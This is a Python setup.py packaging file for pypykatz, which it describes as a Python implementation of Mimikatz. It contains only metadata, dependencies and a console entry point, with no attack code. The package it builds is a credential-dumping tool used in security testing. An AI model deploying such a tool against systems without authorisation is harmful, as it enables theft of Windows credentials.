from setuptools import setup, find_packages

setup(
	# Application name:
	name="pypykatz",

	# Version number (initial):
	version="0.0.1",

	# Application author details:
	author="Tamas Jos",
	author_email="info@skelsec.com",

	# Packages
	packages=find_packages(),

	# Include additional files into the package
	include_package_data=True,


	# Details
	url="https://github.com/skelsec/pypykatz",

	zip_safe = True,
	#
	# license="LICENSE.txt",
	description="Python implementation of Mimikatz",

	# long_description=open("README.txt").read(),
	python_requires='>=3.6',
	classifiers=(
		"Programming Language :: Python :: 3.6",
		"License :: OSI Approved :: MIT License",
		"Operating System :: OS Independent",
	),
	install_requires=[
		'minidump>=0.0.6',
		'minikerberos>=0.0.4',
	],
	
	entry_points={
		'console_scripts': [
			'pypykatz = pypykatz.bin.pypykatz:main',
		],
	}
	
	
)